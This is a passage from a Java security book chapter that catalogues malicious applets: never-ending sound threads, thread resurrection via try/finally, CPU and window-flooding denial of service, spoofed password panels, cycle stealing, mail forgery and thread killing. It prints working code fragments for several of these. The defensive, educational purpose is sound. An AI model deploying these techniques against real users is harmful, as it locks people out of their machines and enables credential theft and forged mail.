Another way to protect against malicious applets is by improving Java's security model. To the extent that any holes identified by researchers have been quickly and thoroughly patched, the security model can be said to be improving. However, the practice of patching software after exploits have been demonstrated is backwards. This unfortunately common strategy is known as penetrate and patch, and has been criticized for many years by security practitioners. (For more on this issue, see [McGraw, 1998].) Better software engineering and more thorough software assurance practices are much more appealing. It is even possible to write your own code defensively so it makes a much harder target for bad guys to attack (see both the guidelines of Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely," and Chapter 9, "The Future of Java Security: Challenges Facing Mobile Code").

The addition of code signing to Java in JDK 1.1 and its extension with access control in Java 2 allow for the creation of complex security policies based on authentication of applet signers. Using this technology, a Web surfer could specify a list of trusted sites whose applets should be allowed to run without restrictions. The trick is creating a sound security policy and correctly coding it into your browser.

The next few sections discuss various kinds of malicious applets. Starting with the least worrisome category (the merely annoying), the text progresses through the truly malicious machine-hangers. Possible motives for creating these applets are discussed along the way. Keep in mind while you read this chapter that the malicious applets described here pale in comparison with the attack applets described in Chapter 5. Fortunately, the security researchers who discovered those vulnerabilities are the good guys.
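To make the trusted-sites idea above concrete, a Java 2 policy entry that lets applets from a single trusted server run with no restrictions at all might look like the following sketch (the URL is made up, and granting AllPermission should be reserved for servers you trust completely):

grant codeBase "http://apps.trusted-intranet.example.com/-" {
    // Code loaded from this server escapes the sandbox entirely.
    permission java.security.AllPermission;
};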
Disabling Java
Certainly, many unsavory characters are on the Net, and many of them have created similarly unsavory Web pages. If for some reason you wish to check such sites out, it would be a good idea to disable Java first. The best way to protect yourself from malicious applets is to create a policy that allows only code you trust to run. It is quicker and easier, however, to disable Java when surfing dangerous Web sites. Much like being street-wise in a big city, your choice to use or disable Java depends on what browsing you will be doing. If you keep to the sites of big business, you are less likely to find dangerous applets, just as the finance districts of New York and Chicago are less dangerous than the housing projects. Know where you are on the Web and take precautions accordingly.
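What might such a trust-based policy look like in practice? Below is a minimal, illustrative fragment in the Java 2 policy-file format; the keystore name and the signer alias are assumptions of ours, not anything shipped with the JDK. The idea is that only code signed by a party you trust gets extra privileges, while everything else stays in the default sandbox. Appendix C describes the signing tools themselves.

// Illustrative Java 2 policy fragment (keystore path and alias are hypothetical).
keystore ".keystore";

// Code signed by the alias "trustedsigner" may read and write files under
// /tmp; unsigned code receives no extra permissions at all.
grant signedBy "trustedsigner" {
    permission java.io.FilePermission "/tmp/-", "read,write";
};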
Disabling Java in Netscape Navigator 4.x

Disabling Java under Netscape Navigator 4.x is easy and can be done in the midst of a session. Reenabling Java is also possible, should you change your mind. Figures 4.1 and 4.2 explain how Java can be disabled in Netscape Navigator 4.x.
Figure 4.1 Disabling Java in Netscape Navigator under Solaris. From the Edit menu, select Preferences. Click on the word Advanced, which will appear in the window entitled "Category" (as shown here). To the right of that window, a series of radio buttons will appear, one of them labeled Enable Java. Click the button so it appears to be sticking out. Finally, click OK, and Java will be disabled.
Figure 4.2 Disabling Java in Netscape Navigator under Windows NT. From the Edit menu, select Preferences. Click on the word Advanced, which will appear in the window entitled "Category" (as shown here). To the right of that window, a series of checkboxes will appear, one of them labeled Enable Java. Click on the check box, removing the check mark. Finally, click OK, and Java will be disabled.
Disabling Java in Internet Explorer 4.x

Internet Explorer also allows Java to be disabled. Figure 4.3 explains how Java can be disabled in Internet Explorer 4.x.
Figure 4.3 Disabling Java in Microsoft Internet Explorer. Unfortunately, under MSIE you can only disable Java on a per-zone basis. From the View menu, select Internet Options. Click on the Security tab. Select the zone for which you want to disable Java (for example, the Internet zone). (For more on zones, see Chapter 1.) Then select the Custom radio button and click on the Settings button. A dialog will come up called Security Settings. This is the dialog shown here. Scroll down until you see the Java category. It will have an expanded sub-category called Java permissions. The sub-category will have a list of options. Click on the circle labeled Disable Java, then click OK. You'll then be back at the Security tab. Click OK again, and Java will be disabled.
Snagging Malicious Code

Running malicious code, especially code that explicitly claims to be malicious, is always an interesting conundrum. You may want to check a malicious applet out to see how it works against your machine, but at the same time, you don't want your machine to be compromised by an attack. Although it is advisable to avoid running malicious code at all, some people can't resist. The following strategy may help.
With Java off, surf to the Web page with a suspected malicious applet; for example, the DigiCrime site includes a malicious applet called "bluescreen" at www.digicrime.com/exploits/javawin. A quick look at the HTML source for the page shows that the malicious applet is invoked with the following code snippet:

<APPLET CODE="bluescreen.class" CODEBASE="http://www.digicrime.com/surprise" width=1 height=1>

This gives you all the information you need to snag the class file (without running it) and bring it home for dissection. The next step is to point your browser directly at the class file by opening URL www.digicrime.com/surprise/bluescreen.class. Your browser will display some gobbledygook like Ê_°_me`, which is actually the byte code of the class file as shown in "human readable" form. Use the Save As feature of your browser to save the file bluescreen.class on your disk.

Now that you have the file, you can use a Java decompiler to turn it back into readable Java source code. The once-popular Mocha decompiler is now out of date as its author, Han Peter van Vliet, died an untimely death. However, there are other decompilers available. The best is the SourceAgain decompiler from Ahpah Software. After decompiling the byte code, you can inspect the resulting Java source code for malicious behavior.

Note that the decompilation issue is a complex political football. Laws have been proposed that make decompiling copyrighted code illegal, even if it is done by security researchers for the purposes of code analysis. The intent of the laws is to prevent software piracy, but they are overly broad in their language. The bottom line is to educate yourself about such laws before you begin decompiling code to analyze it.

Once you know what a malicious applet is going to do, you may feel more comfortable running it. Keep in mind that there is no guarantee that the class file that you grab and decompile will be the same as the one you eventually run from a Web site. The Web server can easily be programmed to bait and switch so that it changes the class file that it distributes unpredictably. Unless you run your grabbed copy of the class file from your own Web server, all bets are off.
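If you would rather script the grab than use the browser's Save As feature, the following minimal sketch does the same job: it fetches the raw bytes without ever handing them to a VM for execution. The URL is the one quoted above, and there is of course no guarantee that the file is still served there.

// SnagClass.java -- fetch a .class file for offline inspection only.
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;

public class SnagClass {
    public static void main(String[] args) throws Exception {
        URL url = new URL("http://www.digicrime.com/surprise/bluescreen.class");
        InputStream in = url.openStream();
        FileOutputStream out = new FileOutputStream("bluescreen.class");
        byte[] buf = new byte[4096];
        int n;
        while ((n = in.read(buf)) != -1) {
            out.write(buf, 0, n);
        }
        out.close();
        in.close();
        // The saved file can now be handed to a decompiler, or to the JDK's
        // javap -c tool for a raw byte code disassembly.
    }
}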
Section 2 -- Annoying Applets
The simplest kind of malicious applet is only annoying. Malicious applets of this type do things just beyond acceptable. Because Java has powerful multimedia packages, annoying applets can do a large variety of things, ranging from playing sound files continuously to displaying obscene pictures. Java has attracted its share of bad programmers and, depending on your point of view, bad Java code can be annoying. To be counted as a hostile applet, some malicious intent on the part of the author is usually required; therefore, unintentionally lousy Java code may not count. Just for the record, a poorly written Java applet may aid a real cracker in breaking your Java security system. Avoid running crummy code, and if you're developing code, use sound software engineering practices and follow the guidelines provided in Chapter 7.

One particularly humorous annoying applet opens a dialog box with the message "April Fools" and an OK button. Users naturally think the applet is supposed to exit when you click OK as it says on the screen. But the dialog box zips around the screen, avoiding the mouse as the user tries to click OK. This quirk renders the applet difficult to stop through normal means. The easiest way to get rid of it is to exit the browser.

Listing 4.1 provides the code for another annoying applet based on an idea from Mark LaDue.1 This applet appears to be well-behaved, at first. All it does is display a nice little picture of one of the author's dogs (and baby Jack). It also plays some appropriate background sound (the dog barking). Not all that exciting for an applet. The code is shown in Listing 4.1.

Listing 4.1 NoisyApplet sustains a thread past the time its creating class is unloaded.
/* NoisyApplet.java */
/* Adapted from the NoisyBear applet of Mark LaDue. */
/* You will need a sound file and a picture to make this work. */
/* This applet is provided solely as an example and is not */
/* guaranteed to do anything. */
/* Use it at your own risk. */

import java.applet.AudioClip;
import java.awt.*;

public class NoisyApplet extends java.applet.Applet implements Runnable {
    Font msgFont = new Font("TimesRoman", Font.PLAIN, 36);
    Thread noisethread = null;  // thread to run sound in
    Image jackImage;
    Image offscreenImage;
    Graphics offscreenGraphics;
    AudioClip bark;             // sound file variable

    // the init() runs to set things up
    public void init() {
        // first, set up the picture
        jackImage = getImage(getCodeBase(), "jack+waldog.jpg");
        offscreenImage = createImage(this.size().width, this.size().height);
        offscreenGraphics = offscreenImage.getGraphics();
        // then load the audio file
        bark = getAudioClip(getCodeBase(), "bark.au");
    }

    // the start() method runs whenever you enter the
    // applet's page. it also runs after init()
    public void start() {
        // start a thread to run the audio clip in
        if (noisethread == null) {
            noisethread = new Thread(this);
            noisethread.start();
        }
    }

    // the stop() method runs when you exit
    // the applet's page
    public void stop() {
        if (noisethread != null) {
            // uncommenting the following 2 lines will stop
            // the sound
            // if (bark != null)
            //     bark.stop();
            noisethread.stop();
            noisethread = null;
        }
    }

    // this starts the ball rolling by telling the sound
    // to "go"
    public void run() {
        if (bark != null)
            bark.loop();
    }

    // the paint() method draws the graphics
    public void paint(Graphics g) {
        int jack_width = jackImage.getWidth(this);
        int jack_height = jackImage.getHeight(this);
        offscreenGraphics.drawImage(jackImage, 0, 0, jack_width, jack_height, this);
        offscreenGraphics.setColor(Color.red);
        offscreenGraphics.setFont(msgFont);
        offscreenGraphics.drawString("Walnut says HI HI HI ...", 150, 225);
        // actually draw the image
        g.drawImage(offscreenImage, 0, 0, this);
    }
}
This applet has been tested and proven to be annoying on a large number of platform/browser combinations. What makes the NoisyApplet annoying is that the sound never stops, even if the user surfs to another Web page. How could this happen? Simple; the applet starts a thread that never stops! Why does the sound keep on going? As you can see in Listing 4.1, the stop() method of the NoisyApplet class has been redefined. The redefinition makes the thread live until the user either figures out how to kill the thread, disables audio on the target machine, or quits the browser.2 None of these options are particularly convenient. Uncommenting the two commented-out lines would silence our NoisyApplet by installing a more normal stop() method; leaving them commented out turns our somewhat-typical applet into a malicious annoyance. Clearly, the line between an honest mistake and an antagonistic programming practice is very fine indeed.
There are some interesting implications that our simple annoying applet introduces. Any thread can employ the same strategy of redefining the stop() method in order to run ad infinitum. Depending on the way a Security Manager is written, Java may not require a programmer to stop all threads. Overriding the default stop() method is, as we have shown, a trivial exercise. Threads can run even in the absence of the applet that spawned them, meaning that it is possible to write threads that monitor what the user is doing.
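By way of contrast, here is roughly what a well-behaved applet's thread handling looks like. This is a minimal sketch of ours (the class and field names are invented for illustration): the worker thread polls a flag rather than relying on the browser to kill it, so stop() really does stop the work.

// PoliteApplet -- a cooperative alternative to never-ending threads.
public class PoliteApplet extends java.applet.Applet implements Runnable {
    private volatile boolean running = false;
    private Thread worker = null;

    public void start() {
        running = true;
        worker = new Thread(this);
        worker.start();
    }

    public void stop() {
        running = false;   // politely ask the worker to quit
        worker = null;
    }

    public void run() {
        while (running) {
            // do one bounded unit of work, then re-check the flag
        }
    }
}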
Going beyond stop()

Redefining the stop() method is an easy thing to do, but it is sometimes possible to determine that an applet is doing this by inspecting its byte code. An alternative to redefining the stop() method is wrapping an attack in a try/finally block. This technique is often seen in malicious applets. In fact, today's slickest malicious applets both redefine stop() and use a try/finally strategy. An example is shown in Listing 4.3.

Listing 4.3 Using try/finally to defeat ThreadDeath.

public void run() {
    try {
        // do something interesting here
    } catch (ThreadDeath td) {
        System.out.println("Can't touch this!");
    } finally {
        // Return from the dead
        Thread reborn = new Thread(this, "new");
        reborn.start();
    }
}
The idea is to catch any exceptions that might be sent to an applet thread to try to kill it (for example, a ThreadDeath exception, which is what is thrown when Thread.stop() is called). These exceptions are caught in the body of the block. In the finally block, a malicious applet can include code to resurrect itself in case of a problem. Note that the same sort of thing can be done using an applet's finalize() method, which gets invoked during garbage collection. This technique counters all attempts to kill a thread and can be used to defeat a majority of commercial Java security packages that claim to be able to kill hostile applets.

Stopping an applet that does not want to be stopped is a nontrivial undertaking. One approach might be to hook deeply into the Java runtime and terminate an actual OS thread, but this is problematic since it would sometimes destabilize the entire browser. While stopping applets is difficult, making monitoring applets is easy.
The Business Assassin Applet

One such monitoring applet (possibly an armchair exercise) is called the Business Assassin applet [Dean, et al., 1996; LaDue, 1996]. The Business Assassin targets the applets of a particular Web site, such as applets from Gamelan. If you place this applet on your homepage, it will start up threads on the remote machine of anyone who surfs your site with Java enabled. These threads silently watch for other applets being loaded from Gamelan. If the monitoring threads detect the user surfing the Gamelan Web site, they begin the attack. The malicious threads make useless any applets coming in from Gamelan. They kill the threads of Gamelan applets (something discussed in more detail on page 135). Another feature of the Business Assassin applet (code disabled by default) goes on to launch a denial-of-service attack against anyone who visits Gamelan after running the Assassin.

On the surface, the Business Assassin applet appears to be harmless; that is because it uses threads to do all the dirty work. Threads are not required to stop running when an applet's Web page is exited. This means that threads can keep running in the browser after an applet has appeared to finish. In order to have the blame pinned on some other applet, hostile threads can be programmed to delay their attack until some future time. In the case of the Assassin's threads, an apparent problem in the Security Manager (only addressed recently by Java 2) allows the Assassin threads to attack thread groups that belong to applets other than their own. It waits for the target threads from Gamelan to appear and only then initiates hostile activity.

Applets like the Business Assassin will certainly have a chilling effect on Web-based commerce. Even if applets that use never-ending threads are not used for annoying things like these, they still have the potential to be used for information gathering. If an applet can spawn a monitoring thread, there is no reason that it could not report information it finds interesting back to its server. Such information could include lists of sites a user has visited, files that he or she has downloaded, the names of other competing applets run, or a host of other things. Such monitoring applets should be named BigBrother.
Section 3 -- Denial of Service
In a cracker's world, the next-best thing to breaking in to your computer is locking you out of it. After all, if the cracker cannot use your computer, then neither should you! Attacks that prevent someone from using his or her machine are called denial-of-service attacks in the security community. Denial of service comes in many guises. Attacks may involve consuming all available CPU cycles, allocating every last bit of memory, hogging all possible screen space, or causing a system to hang while it waits for something impossible to happen. The one common requirement is that the user being attacked is effectively locked out of his or her machine. An effective denial-of-service attack happens so quickly that it's usually impossible to stop it. Experiencing such an attack is a sobering event.

There are many ways to write applets initiating denial-of-service attacks. We think these attacks are serious enough that code for them is not listed here. Examining some attacks through high-level description and occasional code fragments should be enough to illustrate a point. Realistically, the sorts of malicious applets being described are not too difficult to dream up. People who are interested will be able to either create the code or find it, as they see fit.

Consider the denial-of-service attack presented in Listing 4.4. It recycles an idea from the NoisyApplet making use of nonterminating threads. Quite simple to formulate, it looks something like this:

1. Create an applet that starts a thread with its priority set to MAX_PRIORITY. This makes the thread run as quickly as possible and gives it a leg up in the ongoing competition between threads for CPU time.
2. Redefine the stop() method to null for the thread.
3. Do something silly in the main part of the applet so that it appears to be harmless. Show a picture or display some cute animation.
4. Have the thread sleep for a while to delay its malicious activities. Such sleight of hand will have the effect of placing the blame somewhere else when the thread wakes back up to perform its dirty work.
5. When the thread wakes up, have it begin calculating in an infinite loop (or some other CPU-intensive activity that eats cycles). Such a computation will, in effect, bring the browser down by taking away all available computational resources. One particularly worthy function for intense calculation overload is the Ackerman function shown in Listing 4.4.

Listing 4.4 The Ackerman function implemented as a Java application. Ackerman takes integer n and exponentiates n by itself n times. This means that Ackerman(3) is equivalent to three cubed, cubed. The program can be run by typing the command java Ackerman n, where n is an integer. Computing anything greater than Ackerman(3) takes a long time and many CPU cycles. This code was written to be as inefficient as possible. This version of Ackerman could easily be used in a denial-of-service attack.
import java.lang.System;
import java.io.IOException;
import java.lang.Math;

class Ackerman {
    public static void main(String[] args) {
        long ackValue = 1;
        long exp = 0;
        if (args.length >= 1) {
            try {
                exp = Integer.parseInt(args[0]);
            } catch (NumberFormatException e) {
                exp = 0;
            }
        }
        if (exp > 1) {
            ackValue = exp;
            int numLoops = (int) exp;
            for (int i = 1; i < numLoops; i++) {
                exp = ackValue;
                for (int j = 1; j < numLoops; j++) {
                    ackValue = ackValue * exp;
                    System.out.println("current value is " + ackValue);
                }
            }
            System.out.println("Ackerman value: " + ackValue);
        }
    }
}
This denial-of-service approach is simple and elegant. There are literally hundreds of things that can be done in Step 5. Other possibilities include endlessly appending to a StringBuffer and using drawString to display its entire contents. This ends up as a double whammy, eating both CPU cycles and memory. Another possibility would be calculating pi using the most inefficient algorithm possible. If you have trouble remembering how to code poorly, just teach an introductory programming course to jog your memory.
On a more serious note, this line of attack is both very simple and very successful. Most browsers seize up and die under such an attack. Applets that implement these strategies exist on the Web now. Skeptical readers are welcome to surf over and kill their browsers personally (www.rstcorp.com/hostile-applets/). Just surf to a Web page containing hostile applets using a Java-enabled browser, and they will automatically be invoked. Short of creating and enforcing a mobile code policy based on code-signing, nothing can be done to prevent them. Chapter 6 examines some strategies for protection, but they are all still in early development. Just to complicate matters, such a hostile applet can implicate other Web pages by using delay tactics discussed previously.
Is Denial of Service All That Bad?

There is no doubt that denial-of-service attacks are less serious than security breaches of the sort we discuss in Chapter 5. Although a browser might be crashed with such attacks, intruders do not gain entry into a system. This has led some people at JavaSoft to dismiss this class of attacks as unimportant. Before Arthur van Hoff (one of the original designers of Java) left JavaSoft for Marimba, he posted a note to comp.lang.java that dismissed such problems as either not very serious or a concern for browser vendors, not JavaSoft.

Although the most serious security problems should be addressed first, denial-of-service applets should also be addressed. Using resource allocation limitations-for example, placing upper limits on CPU usage, number of instructions that can run, or number of windows allowed-is one line of defense. Threads should not be able to override the stop() method so easily, either. (The ability to override stop, or not, is now enforced by policy.)

It is ironic that some of the most Java-heavy Web pages almost go as far as denial of service in doing what their programmers intended. Some Java-enhanced sites take quite a while to load (we have heard of some applets that take 10 minutes to start up, even over a very fast T1 connection). The bottleneck likely involves the byte code Verification process and not the network transmission time. Of course, slow loading/verifying really doesn't constitute a true denial-of-service attack.

Even a denial-of-service attack that is no big deal when embedded in an applet becomes a serious problem if it can be launched against a Web server. Sites that use Java-enabled Web servers and configure those servers to allow anyone to upload a servlet are exposing themselves to easy denial-of-service attacks. In short, anyone, anywhere in the world, can bring down such a server whenever he or she feels like it. That's why we recommend that Java-enabled servers only accept servlets from clients that they really trust.
Section 4 -- Opening Untrusted Windows
A more serious denial-of-service attack than browser-killers involves opening large numbers of very large windows. There are a couple of reasons why this kind of attack should be considered more severe. The side effects of this attack tend to freeze access to the keyboard and mouse while the applet runs. This makes the applet harder to control. Also, the way these windows are created and mapped makes it possible to pop up untrusted Java applet windows without the mandatory warning they are supposedly required to display. A denial-of-service applet based on this idea would be very similar to the ones we discussed on page 128, with the addition of the window-popping code shown here:

// In the code below, littleWindow is of type Frame
// Adapted from an idea by Mark LaDue
try {
    // create a window
    littleWindow = new bigFrame("Whocares");
    // make it very big
    littleWindow.resize(1000000, 1000000);
    // position it to cover everything
    littleWindow.move(-1000, -1000);
    // finally, open the window
    littleWindow.show();
} catch (OutOfMemoryError o) {
    repaint();
}

class bigFrame extends Frame {
    Label l;

    // constructor method
    bigFrame(String title) {
        super(title);
        setLayout(new GridLayout(1, 1));
        Canvas whiteCanvas = new Canvas();
        whiteCanvas.setBackground(Color.white);
        add(whiteCanvas);
    }
}
This code opens a very large (1-million x 1-million pixel) white window without the supposedly mandatory untrusted Java applet window message. Put this code in a loop so many windows pile on top of each other, and voilà, an applet that consumes major resources in an interesting new way. The act of generating many windows all at the same time causes many window events to fill the window manager's event queue. This effectively disables the mouse and keyboard, since they talk to the machine through window events themselves. The console of the workstation displaying these very large windows freezes up. There are two things users can do when an attack like this is leveled against them: Go to another machine on the same network to kill the offending browser processes, or reboot (usually with the three-fingered salute).

The ability to open a window without the mandatory untrusted window banner is interesting in its own right. Using variants of such code, it is possible to spoof Web site password panels. This leads to interesting social engineering attacks, wherein an unsuspecting user is asked to provide his or her password due to a spurious security alert event. Many users fall for such schemes. After collecting login and password information, a malicious applet can mail off the information to a collection site for later use by a cracker.

Spoofing Web site password panels is an interesting illustration of how an attacker can whip up a serious attack out of a set of holes that each look fairly innocuous. An adversary could create an applet that appears to stop when the user leaves its page, but really keeps a thread lurking in the browser. That thread could use monitoring techniques to determine when the user has visited a particular target site. It could then display a spoof of the target site's log-in panel. The user would probably be fooled, since the bogus log-in panel would appear at the "right" time. Applets that use a social engineering attack to collect possibly sensitive information can be found at the DigiCrime Web site. Surf there at your own risk.
Section 5 -- Stealing Cycles
Theoretical computer science teaches that some computational problems are much more difficult than others. Very hard problems scale exponentially. Other problems are solvable in polynomial time, but only using an oracle that can correctly decide which path to follow each time a choice is encountered. The second set of problems is termed NP.

One of the most perplexing problems in computer science was introduced in 1977 by three cryptography researchers named Rivest, Shamir, and Adleman. They invented a sophisticated encryption algorithm called RSA (after their initials). The only known Achilles' heel of the RSA cryptosystem rests on the ability (or rather, inability) to factor a very large integer into a product of prime numbers in a reasonable length of time. The exact complexity of prime factoring is not known, but it is expected to be difficult and has proven to be so thus far.

One particular instance of the RSA problem involves factoring a specific 129-digit number into its prime factors. Using theoretical computer science as a guide, Rivest, Shamir, and Adleman estimated that it would take 4 x 10^16 years to factor RSA-129. However, applying the quadratic sieve algorithm along with the collaboration of thousands of volunteers (who donated CPU time on their workstations), researchers solved RSA-129 in 1994 after less than a year of work. The key to the solution was using thousands of computers at the same time to attack the factoring problem. To prove that they had discovered the proper solution, the distributed-factoring researchers used their solution to break a secret coded message that Rivest, Shamir, and Adleman had created in 1977 as a test. The message read, "The magic words are squeamish ossifrage."

Java offers a unique opportunity for use in cooperative projects such as factoring RSA-129. Some of the researchers involved in factoring RSA-129 recently announced they had also factored RSA-130-in a fraction of the time. Java would make cooperative efforts much easier through platform independence.

So what does this have to do with malicious applets? One critical feature of the RSA efforts was the voluntary participation. That is what made them cooperative efforts. The same sort of factoring could be accomplished using a malicious applet. Such an applet would surreptitiously steal CPU cycles from the machine of any Web user who hit its Web page. The applet would spin a thread on the remote machine to run part of a factoring solution on that machine's CPU. After a sufficient amount of work, a partial solution could be mailed back to a collection site for collation with similar results from elsewhere.

There is no reason a CPU-cycle-stealing applet needs to work on factoring. It can perform any work. Using such an applet, a Web miscreant could instantly upgrade his or her 486-DX2/66 into a huge collective machine with the combined power of hundreds of workstations. Workstations around the world could be automatically pressed into service. Imagine the dismay of a CEO who discovers that her new Whiz-bang 4200+ has been helping compute results for a competitor. Or imagine the legal ramifications in store for the owner of a government machine that inadvertently helps a foreign national break an encryption algorithm. Or imagine a computer hardware manufacturer who specs out a competitor's machine using a stealthy benchmark applet. The possibilities are many.
Section 6 -- Forging Mail
Many Net-savvy people are aware of a simple trick that allows users to forge electronic mail. This is accomplished by talking directly to the SMTP daemon on port 25 of a server machine. The mail-forging attack takes advantage of the fact that mail-serving hosts monitor port 25 for incoming Simple Mail Transfer Protocol (SMTP) messages. One of the Internet rites of passage is to telnet to port 25 and send fake mail to a friend. This game is very well known; however, the scheme is easily debunked. The SMTP daemon actually marks the forged mail with the IP number of the machine that connected to port 25, which makes it very easy to discern which machine sent the mail.3 Spammers often forge mail headers so that the true source of a spam message is hard to discern. It is usually easy to detect forged mail by looking carefully at the header. The machine listed in the From line should be the same as the Received: line. Most users and mail readers look only at the From line; systems people know to look at both. Note that some legitimate mail may have differing From and Received: lines, depending on how people send their mail. Here is an example of mail forged by an author on his home machine (tigger.mediasoft.net) to his own work account. Note how the From and Received: lines differ.
From [email protected] Wed Jul 24 19:33:56 1996
Return-Path:
Received: from tigger.mediasoft.net by rstcorp.com (4.1/SMI-4.1)
    id AA21199; Wed, 24 Jul 96 19:33:54 EDT
Received: from rstcorp.com ([email protected][205.139.200.246]) by
    tigger.mediasoft.net (8.6.12/8.6.9) with SMTP id SAA00966 for
    [email protected]; Wed, 24 Jul 1996 18:30:31 -0400
Date: Wed, 24 Jul 1996 18:30:31 -0400
From: [email protected]
Message-Id: <[email protected]>
Apparently-To: [email protected]
Status: RO

This is forged mail.
Applets provide an interesting new twist on the standard approach to mail forging. Because applets load across the network and run on a Web surfer's machine, a mail forging applet can cause the standard SMTP daemon monitoring port 25 to report mail coming from the Web surfer's machine-not the machine serving the applet. This can be leveraged to doubly forge mail. Imagine that Alice hits a Web page and an applet is consequently run on her machine. By using Alice's machine to forge mail from Alice-that is, to forge mail apparently both from her machine and from her account on that machine-the doubly forged mail appears not to have been forged at all! With many standard server configurations, this forging attack is possible. Figure 4.4 illustrates the difference between the standard port 25 attack and the revised applet attack.
Figure 4.4 The usual mail-forging approach versus the applet-based sendmail approach. Because an applet runs on another host, it is possible to doubly forge mail so the resulting message does not appear to be forged.
Forged mail of this sort can be sent to any email address that the applet's author chooses. The message could, of course, be anything at all. To make this more concrete, imagine an applet that sends an email death threat to the president of the United States (a felony) from the account and machine of anyone naïve enough to browse a malicious Web page with Java enabled. Or, imagine an applet that uses mail to spam hundreds of Usenet newsgroups with a fake legal advertisement apparently posted from the victim's machine and account, immediately spawning a mail bomb attack against the applet's victim from angry Usenet users bent on retaliation. There are many variations on this theme. Using threads, it is possible to forge mail in the background while doing something seemingly innocuous in the foreground. This forging activity is currently possible; in fact, there are multiple examples to be found on the Web. The possibly surprising fact is that the attack we have described is completely within the security bounds of what SMTP and Java are allowed to do. Forging mail like this is neither particularly sophisticated nor hard to implement. On the other hand, the havoc that could be wreaked with a malicious applet of this sort is serious.
Section 7 -- Killing Off the Competition
The Business Assassin applet discussed earlier combines two dirty tricks. The first trick is to spawn a monitoring thread to watch for applets from another site. The second trick is to kill the threads of any incoming applets. According to the rules, an applet should not be allowed to kill the threads of other applets. Unfortunately, what should not be allowed to happen and what actually can happen are not always the same. Implementation bugs in the security check for thread access for all JDKs through 1.1.5 allow downloaded applets to access threads outside their own thread group. Killing a thread is easy. Here is a code fragment that does it:

private static void ThreadMurder(Thread t) {
    t.stop();
}
You may wonder why the t.stop() method is inside the ThreadMurder() method. This code will kill any thread t. It would be wise for the thread calling ThreadMurder() not to kill itself. A test inside ThreadMurder() is an obvious way to protect the calling thread. All that is needed is a simple name check. If the thread turns out to be checking itself, a decision is made to do nothing.

To make an applet that kills all threads not belonging to itself requires a bit more work. For clarity, let's call this applet AssassinApplet. A recursive approach to AssassinApplet is probably best. The basic outline is:

1. Starting with the current thread group, ascend to the root thread group.
2. From the root, recursively descend through all threads and thread groups below.
3. Kill each thread encountered (but not self).
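A minimal sketch of the traversal in this outline follows. To keep it harmless on the page we only list the threads we find; the comment marks the spot where a hostile applet would call its ThreadMurder() routine instead. In any correctly implemented browser, the Security Manager's thread-access checks should throw a SecurityException long before an untrusted applet gets that far.

// Walk up to the root ThreadGroup, then enumerate every thread below it.
ThreadGroup group = Thread.currentThread().getThreadGroup();
while (group.getParent() != null) {
    group = group.getParent();
}
Thread[] threads = new Thread[group.activeCount() * 2];
int count = group.enumerate(threads, true);   // true = recurse into subgroups
for (int i = 0; i < count; i++) {
    if (threads[i] != Thread.currentThread()) {
        System.out.println("Found thread: " + threads[i].getName());
        // a hostile applet would call ThreadMurder(threads[i]) here
    }
}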
This approach is both very nasty and very effective. If coded as outlined above, an AssassinApplet would be able to kill all other applets running when it starts (a nice way to shut the NoisyApplet up!). It would also kill all applets that it comes across after that. Since it is possible within our framework for the applet to name who should not be killed, the AssassinApplet could run in tandem with other chosen applets. In fact, using the AssassinApplet at all times is a half-baked alternative to turning Java off! Just run the AssassinApplet once at the beginning of a session and after that, all applets encountered from then on are guaranteed to be killed soon after arrival.

The good news is that we can defeat the ThreadMurder attack shown here using the try/finally approach discussed earlier. The bad news is any hostile applet can, too.
Section 8 -- Malicious Applets on the Web
The most extensive collection of malicious applets can be found on Mark LaDue's Hostile Applets Home Page. LaDue does not follow our naming convention, which separates attack applets from malicious applets. But in any case, all of the applets that LaDue has created are malicious applets. In July 1998, a group of LaDue's newer malicious applets, those that allow creation of a ClassLoader in Netscape 4.04 and 4.05, were leveraged to create an attack applet. LaDue's ClassLoader subclassing, when combined with the ClassLoader bug discovered by the Princeton team (see Chapter 5), made a real attack possible.

LaDue's malicious applets perform the following hostile activities:
● Play a sound file forever (our NoisyApplet is adapted from this one).
● Kill a browser with a CPU-hogging attack.
● Consume all available memory on your machine.
● Spin endless threads to consume resources.
● Display many hundreds of large black windows.
● Combine many denial-of-service attacks (windows, threads, and sounds) into one payload.
● Pop a fake dialog box requesting sensitive information (username and password).
● Surreptitiously perform remote calculation and report results back to the server.
● Forge mail.
● Kill all applet threads (except for self).
● Send your browser to a URL over and over again.
● Obtain your username.
● Fill all disk space available to the browser.
● Create an AppletClassLoader (a good staging ground for more serious attacks).
● Exercise mystery methods (undocumented but available) that crash a browser.
● Misuse native methods through the Java API, resulting in a crash.
● Deny legitimate use of the audio system by retaining control over it.
● Steal information about the SystemPrincipal and create an impostor.
● Determine exactly which plugins a browser has with help from JavaScript.
● Steal information from a Java Wallet (including username and password).
● Carry out some social engineering in order to rewire the Help button of the Java Wallet.
● Cause a modem connected to an arbitrary serial port to dial.
The most interesting feature of LaDue's malicious applets is that source code is made available. LaDue is clearly no proponent of keeping secrets! No other author of malicious applets has been as prolific as LaDue, but notable among available malicious applets are:
● An extremely simple recursive applet that pops the stack and crashes the VM (Naval Postgraduate School)
● A mail forger and a file scanner written by Jim Buzbee
● An applet that abuses the redirect capability written by Ben Messander
Links to known malicious applets on the Web are maintained on the Java Security Hotlist.
The Base Java Security Model: The Original Applet Sandbox
Section 13 -- Is There Really a Java Security Policy?
The base Java security sandbox comprises three major components: the byte code Verifier, the Class Loader, and the Security Manager. Each of these components must work properly in order for Java to perform in a secure fashion. The Security Manager depends on Class Loaders to correctly label code as trusted or untrusted. Class Loaders also shield the Security Manager from spoofing attacks by protecting local trusted classes making up the Java API. On the other hand, the class loader system is protected by the Security Manager, which ensures that an applet cannot create and use its own Class Loader. The Verifier protects both the Class Loaders and the Security Manager against language-based attacks meant to break the VM. All in all, the three parts intertwine to create a default sandbox.

However, the three parts are not created or specified by a standards committee. Java applications, including Java-enabled Web browsers, are allowed to customize two of the fundamental portions of the security model to suit their needs (the Class Loader and the Security Manager). The security model is much more distributed than many computer security experts would like [Badger and Kohli, 1995]. In the end, a great deal of faith is placed in the ability of VM implementations to ensure that untrusted code remains properly contained. Bugs in the system will compromise the entire security model.

